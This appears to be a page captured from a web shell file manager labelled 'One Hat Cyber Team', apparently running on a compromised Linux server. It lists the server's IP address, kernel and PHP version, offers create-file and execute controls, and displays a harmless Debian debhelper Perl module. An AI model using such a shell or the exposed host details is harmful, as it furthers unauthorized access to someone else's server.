⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.62
Server IP:
57.129.66.90
Server:
Linux vps-7f548908 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
perl5
/
Debian
/
Debhelper
/
Sequence
/
View File Name :
installinitramfs.pm
#!/usr/bin/perl # Enable dh_installinitramfs use strict; use warnings; use Debian::Debhelper::Dh_Lib qw(compat error); if (not compat(11)) { error("In compat 12, dh_installinitramfs is run by default and the installinitramfs-sequence is no longer required."); } insert_after('dh_installgsettings', 'dh_installinitramfs'); 1;